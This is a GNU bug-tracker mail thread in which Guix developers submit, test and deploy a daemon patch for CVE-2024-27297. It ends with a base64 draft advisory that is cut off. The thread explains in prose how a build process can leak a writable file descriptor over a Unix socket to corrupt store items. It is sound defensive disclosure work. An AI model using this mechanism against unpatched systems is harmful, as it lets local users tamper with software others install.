From debbugs-submit-bounces@debbugs.gnu.org Mon Mar 11 06:55:00 2024 Received: (at submit) by debbugs.gnu.org; 11 Mar 2024 10:55:00 +0000 Received: from localhost ([127.0.0.1]:38958 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjdJ5-0002Bf-5S for submit@debbugs.gnu.org; Mon, 11 Mar 2024 06:54:59 -0400 Received: from lists.gnu.org ([209.51.188.17]:43120) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjdJ2-0002BX-QN for submit@debbugs.gnu.org; Mon, 11 Mar 2024 06:54:58 -0400 Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rjdIU-0000nx-DA; Mon, 11 Mar 2024 06:54:22 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rjdIT-0006Zs-58; Mon, 11 Mar 2024 06:54:21 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:Subject:To:From:in-reply-to: references; bh=l+5IyV/i7GICh3SjFJjAcftWFvuvO+vhOlf4jLTrQGA=; b=bpmAUwQ8cSsB9s 0qSrDHmtmmqccunDIhp4tNaD4MUz5ZuB3w4j+5nI76bYTJFVhoQHUfc+lCR/x8//W6NwxoqTI4sn7 fJx11qUQFu9Qa971Tdg8CDs4J8dMxJwnIDSV6fpcG7kCqt0C5yF9Fo7i9FxXjGTcrFp/XbHf46JeE Cw9wGxa5YIgVtHUuvyshOzNIcF2Q/fGpQ8W02h5nUBtDcVACMlfJceWGoXb/J3Z4QD1MWZk8JZmsh gNyp8IuItgZk8Zp9rxx77lj7eOmRRV8dUyPAVjm04Vb0xwAWttJzASVhfgf0p0DoGEox/A3fWn9jz q/fBU9yqs/0ysSOWcrng==; From: =?UTF-8?q?Ludovic=20Court=C3=A8s?= To: guix-patches@gnu.org Subject: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). Date: Mon, 11 Mar 2024 11:54:00 +0100 Message-ID: X-Mailer: git-send-email 2.41.0 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: submit Cc: Picnoir , =?UTF-8?q?Ludovic=20Court=C3=A8s?= , =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= , guix-security@gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) This fixes a security issue (CVE-2024-27297) whereby a fixed-output derivation build process could open a writable file descriptor to its output, send it to some outside process for instance over an abstract AF_UNIX socket, which would then allow said process to modify the file in the store after it has been marked as “valid”. Nix security advisory: https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37 * nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and a file descriptor. Rewrite the ‘Path’ variant accordingly. (copyFile, copyFileRecursively): New functions. * nix/libutil/util.hh (copyFileRecursively): New declaration. * nix/libstore/build.cc (DerivationGoal::buildDone): When ‘fixedOutput’ is true, call ‘copyFileRecursively’ followed by ‘rename’ on each output. Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4 Reported-by: Picnoir , Théophane Hufschmitt Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88 --- nix/libstore/build.cc | 16 ++++++ nix/libutil/util.cc | 112 ++++++++++++++++++++++++++++++++++++++++-- nix/libutil/util.hh | 6 +++ 3 files changed, 129 insertions(+), 5 deletions(-) Hello, On Friday, March 8th, fellow Nix developers Picnoir and Théophane Hufschmitt contacted the Guix security team to let us know about a security vulnerability in the Nix daemon they had just found and addressed in Nix: advisory: https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37 PoC: https://hackmd.io/03UGerewRcy3db44JQoWvw fix: https://github.com/NixOS/nix/commit/244f3eee0bbc7f11e9b383a15ed7368e2c4becc9 By sending a file descriptor to another process on the same machine, a fixed-output derivation build process could give write access to a store item to an unprivileged process, effectively giving an unprivileged user the ability to corrupt that store item. The fix implemented by Nix hackers is nice and simple: upon build completion, the output is copied to a new location and deleted, such that any file descriptors that might have been shared now point to unlinked files. (The PoC above looks at various other ways to fix the problem, and this one is by far the simplest.) The patch below “backports” the Nix fix to our daemon. I ended up having to implement my own ‘copyFileRecursively’ function, which is not great (recent versions of Nix use C++17 ‘std::filesystem’ but we’re stuck on C++11 and making the switch didn’t feel appealing either.) I tested the patch locally with things like: strace -o log.strace -f ./test-env guix build -S guile-ssh strace -o log.strace -f ./test-env guix build -S guile-ssh --check strace -o log.strace -f ./test-env guix build -S hello … looking at the strace output to make sure things were happening as expected. Also, “make check” passes. We’d like to push it probably today, but we’d very much like to get more eyeballs on this code! Thanks again to Picnoir and Théophane! Ludo’. diff --git a/nix/libstore/build.cc b/nix/libstore/build.cc index 461fcbc584..e2adee118b 100644 --- a/nix/libstore/build.cc +++ b/nix/libstore/build.cc @@ -1382,6 +1382,22 @@ void DerivationGoal::buildDone() % drvPath % statusToString(status)); } + if (fixedOutput) { + /* Replace the output, if it exists, by a fresh copy of itself to + make sure that there's no stale file descriptor pointing to it + (CVE-2024-27297). */ + foreach (DerivationOutputs::iterator, i, drv.outputs) { + if (pathExists(i->second.path)) { + Path pivot = i->second.path + ".tmp"; + copyFileRecursively(i->second.path, pivot, true); + int err = rename(pivot.c_str(), i->second.path.c_str()); + if (err != 0) + throw SysError(format("renaming `%1%' to `%2%'") + % pivot % i->second.path); + } + } + } + /* Compute the FS closure of the outputs and register them as being valid. */ registerOutputs(); diff --git a/nix/libutil/util.cc b/nix/libutil/util.cc index 82eac72120..493f06f357 100644 --- a/nix/libutil/util.cc +++ b/nix/libutil/util.cc @@ -215,14 +215,11 @@ bool isLink(const Path & path) } -DirEntries readDirectory(const Path & path) +static DirEntries readDirectory(DIR *dir) { DirEntries entries; entries.reserve(64); - AutoCloseDir dir = opendir(path.c_str()); - if (!dir) throw SysError(format("opening directory `%1%'") % path); - struct dirent * dirent; while (errno = 0, dirent = readdir(dir)) { /* sic */ checkInterrupt(); @@ -230,11 +227,29 @@ DirEntries readDirectory(const Path & path) if (name == "." || name == "..") continue; entries.emplace_back(name, dirent->d_ino, dirent->d_type); } - if (errno) throw SysError(format("reading directory `%1%'") % path); + if (errno) throw SysError(format("reading directory")); return entries; } +DirEntries readDirectory(const Path & path) +{ + AutoCloseDir dir = opendir(path.c_str()); + if (!dir) throw SysError(format("opening directory `%1%'") % path); + return readDirectory(dir); +} + +static DirEntries readDirectory(int fd) +{ + /* Since 'closedir' closes the underlying file descriptor, duplicate FD + beforehand. */ + int fdcopy = dup(fd); + if (fdcopy < 0) throw SysError("dup"); + + AutoCloseDir dir = fdopendir(fdcopy); + if (!dir) throw SysError(format("opening directory from file descriptor `%1%'") % fd); + return readDirectory(dir); +} unsigned char getFileType(const Path & path) { @@ -364,6 +379,93 @@ void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkT _deletePath(path, bytesFreed, linkThreshold); } +static void copyFile(int sourceFd, int destinationFd) +{ + struct stat st; + if (fstat(sourceFd, &st) == -1) throw SysError("statting file"); + + ssize_t result = copy_file_range(sourceFd, NULL, destinationFd, NULL, st.st_size, 0); + if (result < 0 && errno == ENOSYS) { + for (size_t remaining = st.st_size; remaining > 0; ) { + unsigned char buf[8192]; + size_t count = std::min(remaining, sizeof buf); + + readFull(sourceFd, buf, count); + writeFull(destinationFd, buf, count); + remaining -= count; + } + } else { + if (result < 0) + throw SysError(format("copy_file_range `%1%' to `%2%'") % sourceFd % destinationFd); + if (result < st.st_size) + throw SysError(format("short write in copy_file_range `%1%' to `%2%'") + % sourceFd % destinationFd); + } +} + +static void copyFileRecursively(int sourceroot, const Path &source, + int destinationroot, const Path &destination, + bool deleteSource) +{ + struct stat st; + if (fstatat(sourceroot, source.c_str(), &st, AT_SYMLINK_NOFOLLOW) == -1) + throw SysError(format("statting file `%1%'") % source); + + if (S_ISREG(st.st_mode)) { + AutoCloseFD sourceFd = openat(sourceroot, source.c_str(), + O_CLOEXEC | O_NOFOLLOW | O_RDONLY); + if (sourceFd == -1) throw SysError(format("opening `%1%'") % source); + + AutoCloseFD destinationFd = openat(destinationroot, destination.c_str(), + O_CLOEXEC | O_CREAT | O_WRONLY | O_TRUNC, + st.st_mode); + if (destinationFd == -1) throw SysError(format("opening `%1%'") % source); + + copyFile(sourceFd, destinationFd); + } else if (S_ISLNK(st.st_mode)) { + char target[st.st_size + 1]; + ssize_t result = readlinkat(sourceroot, source.c_str(), target, st.st_size); + if (result != st.st_size) throw SysError("reading symlink target"); + target[st.st_size] = '\0'; + int err = symlinkat(target, destinationroot, destination.c_str()); + if (err != 0) + throw SysError(format("creating symlink `%1%'") % destination); + } else if (S_ISDIR(st.st_mode)) { + int err = mkdirat(destinationroot, destination.c_str(), 0755); + if (err != 0) + throw SysError(format("creating directory `%1%'") % destination); + + AutoCloseFD destinationFd = openat(destinationroot, destination.c_str(), + O_CLOEXEC | O_RDONLY | O_DIRECTORY); + if (err != 0) + throw SysError(format("opening directory `%1%'") % destination); + + AutoCloseFD sourceFd = openat(sourceroot, source.c_str(), + O_CLOEXEC | O_NOFOLLOW | O_RDONLY); + if (sourceFd == -1) + throw SysError(format("opening `%1%'") % source); + + if (deleteSource && !(st.st_mode & S_IWUSR)) { + /* Ensure the directory writable so files within it can be + deleted. */ + if (fchmod(sourceFd, st.st_mode | S_IWUSR) == -1) + throw SysError(format("making `%1%' directory writable") % source); + } + + for (auto & i : readDirectory(sourceFd)) + copyFileRecursively((int)sourceFd, i.name, (int)destinationFd, i.name, + deleteSource); + } else throw Error(format("refusing to copy irregular file `%1%'") % source); + + if (deleteSource) + unlinkat(sourceroot, source.c_str(), + S_ISDIR(st.st_mode) ? AT_REMOVEDIR : 0); +} + +void copyFileRecursively(const Path &source, const Path &destination, bool deleteSource) +{ + copyFileRecursively(AT_FDCWD, source, AT_FDCWD, destination, deleteSource); +} static Path tempName(Path tmpRoot, const Path & prefix, bool includePid, int & counter) diff --git a/nix/libutil/util.hh b/nix/libutil/util.hh index 880b0e93b2..058f5f8446 100644 --- a/nix/libutil/util.hh +++ b/nix/libutil/util.hh @@ -102,6 +102,12 @@ void deletePath(const Path & path); void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkThreshold = 1); +/* Copy SOURCE to DESTINATION, recursively. Throw if SOURCE contains a file + that is not a regular file, symlink, or directory. When DELETESOURCE is + true, delete source files once they have been copied. */ +void copyFileRecursively(const Path &source, const Path &destination, + bool deleteSource = false); + /* Create a temporary directory. */ Path createTempDir(const Path & tmpRoot = "", const Path & prefix = "nix", bool includePid = true, bool useGlobalCounter = true, mode_t mode = 0755); base-commit: c7836393be4d134861d652b2fcf09cf4e68275ca -- 2.41.0 From debbugs-submit-bounces@debbugs.gnu.org Mon Mar 11 11:04:35 2024 Received: (at control) by debbugs.gnu.org; 11 Mar 2024 15:04:35 +0000 Received: from localhost ([127.0.0.1]:41042 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjhCd-0006sj-HK for submit@debbugs.gnu.org; Mon, 11 Mar 2024 11:04:35 -0400 Received: from eggs.gnu.org ([209.51.188.92]:56610) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjhCc-0006sU-0K for control@debbugs.gnu.org; Mon, 11 Mar 2024 11:04:34 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rjhBu-00083u-IJ for control@debbugs.gnu.org; Mon, 11 Mar 2024 11:03:54 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-version:Subject:From:To:Date:in-reply-to: references; bh=E2rdyicNTr87+bJScn0RD40Y9TBBSbOav8t0EUHqD5w=; b=NZVIFPD8ickEyr IDN591FuJaiaxuDgDzctsp/lyNCewEXQW7wdv8+jPUFHEsieMH2xh5RtkyDYBmVEnOEiPeVlkJZbb QmR/sFCA1BLy6DZ3bw3zeM432J8+yMrTtBHg5HgWao9FTMqZrzxHiT6BP2M1ZQIMfZph91Hz7xzDR yof555lU20L/kf2heRIizHCpB7k9KS8ReBenaI5WIG1QiS4mcZvaxWliVz2Ox9PiEcARUJiQtR4Wt pz62YfrdL+7QeTEuHEYth4eFoKu4qM1QFlWXCdfOEFi+IGarfvcdI717oR6io++UxkxMZhVRJO+fO YU5akU1gMZ44Fnue6UbA==; Date: Mon, 11 Mar 2024 16:03:45 +0100 Message-Id: <87edcgq08e.fsf@gnu.org> To: control@debbugs.gnu.org From: =?utf-8?Q?Ludovic_Court=C3=A8s?= Subject: control message for bug #69728 MIME-version: 1.0 Content-type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: control X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) tags 69728 + security quit From debbugs-submit-bounces@debbugs.gnu.org Mon Mar 11 18:17:24 2024 Received: (at 69728) by debbugs.gnu.org; 11 Mar 2024 22:17:24 +0000 Received: from localhost ([127.0.0.1]:41442 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjnxT-00026D-RK for submit@debbugs.gnu.org; Mon, 11 Mar 2024 18:17:24 -0400 Received: from eggs.gnu.org ([209.51.188.92]:56458) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjnxQ-00025x-Io for 69728@debbugs.gnu.org; Mon, 11 Mar 2024 18:17:21 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rjnwm-0006tT-Bc; Mon, 11 Mar 2024 18:16:40 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:References:In-Reply-To:Subject:To: From; bh=j/akcUHUAvI4THZtkZCkVLgwpU2kzI8sAPSrOYEipgs=; b=YPePDT/ZHqT3pBBlsQa7 tSSUu484hLnh/12JWGriEen3148AxlzX0yk3eaiT3oHTN/sd3FBuvP8CxbzjLWCZrLIwIDtaL4Xcf IyqUvWQafJwAnh8Q2QV4AtyopLP4/EPWQ1/PCp2Pu3VQuBpAUfCJ1/3gXgtBoP9Vf5nR2Z+NDczD/ O5x8V+u2hRIyUR8A52Qk10l/dNL6P3ig2TAS/fF7PuoKrRR24g+nvFfeKWF9CAuVjNWTLBLYeRXvp VuOee8WWiFiSxIua3EHNSKo1KfNYHmXpnGOgLp8B46m6rMNnGs6yi4mDCeY72u6WvgUPtl4jzsz5h jA2jcd7j4/4huA==; From: =?utf-8?Q?Ludovic_Court=C3=A8s?= To: 69728@debbugs.gnu.org Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). In-Reply-To: ("Ludovic =?utf-8?Q?Court=C3=A8s=22's?= message of "Mon, 11 Mar 2024 11:54:00 +0100") References: Date: Mon, 11 Mar 2024 23:16:31 +0100 Message-ID: <87frwwo1mo.fsf@gnu.org> User-Agent: Gnus/5.13 (Gnus v5.13) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , =?utf-8?Q?Th=C3=A9ophane?= Hufschmitt , guix-security@gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) Ludovic Court=C3=A8s skribis: > This fixes a security issue (CVE-2024-27297) whereby a fixed-output > derivation build process could open a writable file descriptor to its > output, send it to some outside process for instance over an abstract > AF_UNIX socket, which would then allow said process to modify the file > in the store after it has been marked as =E2=80=9Cvalid=E2=80=9D. > > Nix security advisory: > https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37 > > * nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and > a file descriptor. Rewrite the =E2=80=98Path=E2=80=99 variant accordingl= y. > (copyFile, copyFileRecursively): New functions. > * nix/libutil/util.hh (copyFileRecursively): New declaration. > * nix/libstore/build.cc (DerivationGoal::buildDone): When =E2=80=98fixedO= utput=E2=80=99 > is true, call =E2=80=98copyFileRecursively=E2=80=99 followed by =E2=80=98= rename=E2=80=99 on each output. > > Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4 > > Reported-by: Picnoir , Th=C3=A9ophane Hufschmi= tt > Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88 > --- > nix/libstore/build.cc | 16 ++++++ > nix/libutil/util.cc | 112 ++++++++++++++++++++++++++++++++++++++++-- > nix/libutil/util.hh | 6 +++ > 3 files changed, 129 insertions(+), 5 deletions(-) Pushed (with a slightly different commit message) as 8f4ffb3fae133bb21d7991e97c2f19a7108b1143. Updated the =E2=80=98guix=E2=80=99 package in b8954a7faeccae11c32add7cd0f40= 8d139af3a43: Guix System users can now reconfigure! Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994. Ludo=E2=80=99. From debbugs-submit-bounces@debbugs.gnu.org Mon Mar 11 20:44:12 2024 Received: (at 69728) by debbugs.gnu.org; 12 Mar 2024 00:44:12 +0000 Received: from localhost ([127.0.0.1]:41485 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjqFX-0006B6-UN for submit@debbugs.gnu.org; Mon, 11 Mar 2024 20:44:12 -0400 Received: from mail-4316.protonmail.ch ([185.70.43.16]:45671) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rjqFP-0006AH-Vc for 69728@debbugs.gnu.org; Mon, 11 Mar 2024 20:44:10 -0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=protonmail.com; s=protonmail3; t=1710204203; x=1710463403; bh=0LgM+/lGmkb18KDfs5kLtXccSJIPaTAfxqy1XlXvdCk=; h=Date:To:From:Cc:Subject:Message-ID:In-Reply-To:References: Feedback-ID:From:To:Cc:Date:Subject:Reply-To:Feedback-ID: Message-ID:BIMI-Selector; b=m5d3o4vzeFz1wkUQ1za8Cq7O0j9s0k5U8+20bJSTcEGi92dyKJ3mAcpEwedHeFBK2 zQzKfmAGAZvZMrQGu3k3hO7UXHC4YtfK/rQljX7tzufg17ZosCS0BBDn9UP3ThX0g1 KvX3/a+l17vkno2OTSiEBIo8zOX5T93yto/pNxOgv4OU1Wfn0pEMljULom2N43IszY bHeM/jXHVTxb5KKL98SBIHk1L1K0kl4Ic9dLpjDKmByFTAZbX/70+LA4h4iSkj7N8+ AnGguPkC4j5azYqBzZil0nJ6/roTiqUoZmKtGoH4QEeX+n2u4HMfDCDNmkxiMLLxvC oLImZ6XxCmdSQ== Date: Tue, 12 Mar 2024 00:42:58 +0000 To: =?utf-8?Q?Ludovic_Court=C3=A8s?= From: John Kehayias Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). Message-ID: <87o7bk2sc6.fsf@protonmail.com> In-Reply-To: <87frwwo1mo.fsf@gnu.org> References: <87frwwo1mo.fsf@gnu.org> Feedback-ID: 7805494:user:proton MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="b1_v9MImMNBpPThzWrxGvqTjxdi8tCRgZnkdE9D8lqlmSc" X-Spam-Score: -0.0 (/) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , guix-security@gnu.org, =?utf-8?Q?Th=C3=A9ophane_Hufschmitt?= , 69728@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -1.0 (-) This is a multi-part message in MIME format. --b1_v9MImMNBpPThzWrxGvqTjxdi8tCRgZnkdE9D8lqlmSc Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Hi all, On Mon, Mar 11, 2024 at 11:16 PM, Ludovic Court=C3=A8s wrote: > Ludovic Court=C3=A8s skribis: > >> This fixes a security issue (CVE-2024-27297) whereby a fixed-output >> derivation build process could open a writable file descriptor to its >> output, send it to some outside process for instance over an abstract >> AF_UNIX socket, which would then allow said process to modify the file >> in the store after it has been marked as =E2=80=9Cvalid=E2=80=9D. >> >> Nix security advisory: >> >> >> * nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and >> a file descriptor. Rewrite the =E2=80=98Path=E2=80=99 variant according= ly. >> (copyFile, copyFileRecursively): New functions. >> * nix/libutil/util.hh (copyFileRecursively): New declaration. >> * nix/libstore/build.cc (DerivationGoal::buildDone): When =E2=80=98fixed= Output=E2=80=99 >> is true, call =E2=80=98copyFileRecursively=E2=80=99 followed by = =E2=80=98rename=E2=80=99 on each output. >> >> Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4 >> >> Reported-by: Picnoir , Th=C3=A9ophane >> Hufschmitt >> Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88 >> --- >> nix/libstore/build.cc | 16 ++++++ >> nix/libutil/util.cc | 112 ++++++++++++++++++++++++++++++++++++++++-- >> nix/libutil/util.hh | 6 +++ >> 3 files changed, 129 insertions(+), 5 deletions(-) > > Pushed (with a slightly different commit message) as > 8f4ffb3fae133bb21d7991e97c2f19a7108b1143. > > Updated the =E2=80=98guix=E2=80=99 package in b8954a7faeccae11c32add7cd0f= 408d139af3a43: > Guix System users can now reconfigure! > > Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994. > > Ludo=E2=80=99. Many thanks for the quick fix, deployment, and news entry! I've attached a draft of a blog post to add some information and further alert users. Please give it a read and feel free to make any changes or corrections. Especially if I misunderstood or glossed too quickly over any technical aspects, though I kept it light. And, if all looks good, feel free to take whatever steps to post this to the website. Two minor questions/comments: 1. I made a note that presumably there is some performance penalty for copying everything, probably for derivations with many files. But I haven't tested this, just picked up on this from what was said on the Nix side as a potential impact. 2. Is picnoir the same as F=C3=A9lix Baylac Jacqu=C3=A9? I wasn't sure base= d on emails; fine to change to whatever they want for credit for reporting this to us. Based on what was posted on the Nix side, it seems jade and puckipedia are the original finders/reporters of the security issue. But feel free to correct me. Thanks everyone! John --b1_v9MImMNBpPThzWrxGvqTjxdi8tCRgZnkdE9D8lqlmSc Content-Type: application/octet-stream; name=cve-2024-27297-post.md Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=cve-2024-27297-post.md dGl0bGU6IEZpeGVkLU91dHB1dCBEZXJpdmF0aW9uIFNhbmRib3ggQnlwYXNzIChDVkUtMjAyNC0y NzI5NykKYXV0aG9yOiBKb2huIEtlaGF5aWFzCnRhZ3M6IFNlY3VyaXR5IEFkdmlzb3J5CmRhdGU6 IDIwMjQtMDMtMTIgMDg6MDAKLS0tCgpBIHNlY3VyaXR5IGlzc3VlIGhhcyBiZWVuIGlkZW50aWZp ZWQgaW4gdGhlCltgZ3VpeC1kYWVtb25gXShodHRwczovL2d1aXguZ251Lm9yZy9lbi9tYW51YWwv ZGV2ZWwvZW4vaHRtbF9ub2RlL0ludm9raW5nLWd1aXhfMDAyZGRhZW1vbi5odG1sKQp3aGljaCBh bGxvd3MgZm9yIGZpeGVkLW91dHB1dApbZGVyaXZhdGlvbnNdKGh0dHBzOi8vZ3VpeC5nbnUub3Jn L2VuL21hbnVhbC9kZXZlbC9lbi9odG1sX25vZGUvRGVyaXZhdGlvbnMuaHRtbCkKdG8gaGF2ZSB0 aGVpciBjb250ZW50cyBtb2RpZmllZCBvdXRzaWRlIG9mIHRoZSBzYW5kYm94ZWQgYnVpbGQKZW52 aXJvbm1lbnQgYnkgYW4gdW5wcml2aWxlZ2VkIHByb2Nlc3MuIEFuIGF0dGFja2VyIHdpdGggbG9j YWwgYWNjZXNzCnRvIGEgbWFjaGluZSBjYW4gY2hhbmdlIHRoZSBjb250ZW50cyBvZiBhIGZpeGVk LW91dHB1dCBkZXJpdmF0aW9uLgpUaGlzIHdhcyBvcmlnaW5hbGx5IHJlcG9ydGVkIHRvIE5peCBi dXQgYWxzbyBhZmZlY3RzIEd1aXggYXMgd2Ugc2hhcmUKc29tZSB1bmRlcmx5aW5nIGNvZGUgZnJv bSBhbiBvbGRlciB2ZXJzaW9uIG9mIE5peCBmb3IgdGhlCmBndWl4LWRhZW1vbmAuIFJlYWRlcnMg b25seSBpbnRlcmVzdGVkIGluIG1ha2luZyBzdXJlIHRoZWlyIEd1aXggaXMgdXAKdG8gZGF0ZSBh bmQgbm8gbG9uZ2VyIGFmZmVjdGVkIGJ5IHRoaXMgdnVsbmVyYWJpbGl0eSBjYW4gc2tpcCBkb3du IHRvCnRoZSAiVXBncmFkaW5nIiBzZWN0aW9uLgoKIyBWdWxuZXJhYmlsaXR5CgpUaGUgYmFzaWMg aWRlYSBvZiB0aGUgYXR0YWNrIGlzIHRvIHBhc3MgZmlsZSBkZXNjcmlwdG9ycyB0aHJvdWdoIFVu aXgKc29ja2V0cyB0byBhbGxvdyBhbm90aGVyIHByb2Nlc3MgdG8gbW9kaWZ5IHRoZSBkZXJpdmF0 aW9uIGNvbnRlbnRzLgpUaGlzIHdhcyBmaXJzdCByZXBvcnRlZCB0byBOaXggYnkgamFkZSBhbmQg cHVja2lwZWRpYSB3aXRoIGZ1cnRoZXIKZGV0YWlscyBhbmQgYSBwcm9vZiBvZiBjb25jZXB0Clto ZXJlXShodHRwczovL2hhY2ttZC5pby8wM1VHZXJld1JjeTNkYjQ0SlFvV3Z3KS4gTm90ZSB0aGF0 IHRoZSBwcm9vZgpvZiBjb25jZXB0IGlzIHdyaXR0ZW4gZm9yIE5peCBhbmQgd291bGQgbmVlZCBh IHJld3JpdGUgZm9yIEd1aWxlIGFuZApHTlUgR3VpeCBwYWNrYWdpbmcgdG8gYmUgYXBwbGllZCBk aXJlY3RseSBoZXJlLiBUaGlzIHNlY3VyaXR5IGFkdmlzb3J5CmlzIHJlZ2lzdGVyZWQgYXMKW0NW RS0yMDI0LTI3Mjk3XShodHRwczovL3d3dy5jdmUub3JnL0NWRVJlY29yZD9pZD1DVkUtMjAyNC0y NzI5NykKKGRldGFpbHMgYXJlIGFsc28gYXZhaWxhYmxlIGF0IE5peCdzIEdpdEh1YiBbc2VjdXJp dHkKYWR2aXNvcnldKGh0dHBzOi8vZ2l0aHViLmNvbS9OaXhPUy9uaXgvc2VjdXJpdHkvYWR2aXNv cmllcy9HSFNBLTJmZmotdzRtai1wZzM3KSkKYW5kIHJhdGVkICJtb2RlcmF0ZSIgaW4gc2V2ZXJp dHkuCgpBIGZpeGVkLW91dHB1dApbZGVyaXZhdGlvbl0oaHR0cHM6Ly9ndWl4LmdudS5vcmcvZW4v bWFudWFsL2RldmVsL2VuL2h0bWxfbm9kZS9EZXJpdmF0aW9ucy5odG1sKQppcyBvbmUgd2hlcmUg dGhlIG91dHB1dCBoYXNoIGlzIGtub3duIGluIGFkdmFuY2UuIEZvciBpbnN0YW5jZSwgdG8KcHJv ZHVjZSBhIHNvdXJjZSB0YXJiYWxsLiBUaGUgR05VIEd1aXggYnVpbGQgc2FuZGJveCBwdXJwb3Nl ZnVsbHkKZXhjbHVkZXMgbmV0d29yayBhY2Nlc3MgKGZvciBzZWN1cml0eSBhbmQgdG8gZW5zdXJl IHdlIGNhbiBjb250cm9sIGFuZApyZXByb2R1Y2UgdGhlIGJ1aWxkIGVudmlyb25tZW50KSwgYnV0 IGEgZml4ZWQtb3V0cHV0IGRlcml2YXRpb24gZG9lcwpoYXZlIG5ldHdvcmsgYWNjZXNzLCBmb3Ig aW5zdGFuY2UgdG8gZG93bmxvYWQgdGhhdCBzb3VyY2UgdGFyYmFsbC4KSG93ZXZlciwgYXMgc3Rh dGVkLCB0aGUgaGFzaCBvZiBvdXRwdXQgbXVzdCBiZSBrbm93biBpbiBhZHZhbmNlLCBhZ2Fpbgpm b3Igc2VjdXJpdHkgKHdlIGtub3cgaWYgdGhlIGZpbGUgY29udGVudHMgd291bGQgY2hhbmdlKSBh bmQKcmVwcm9kdWNpYmlsaXR5IChzaG91bGQgYWx3YXlzIGhhdmUgdGhlIHNhbWUgb3V0cHV0KS4g VGhlCmBndWl4LWRhZW1vbmAgaGFuZGxlcyB0aGUgYnVpbGQgcHJvY2VzcyBhbmQgd3JpdGluZyB0 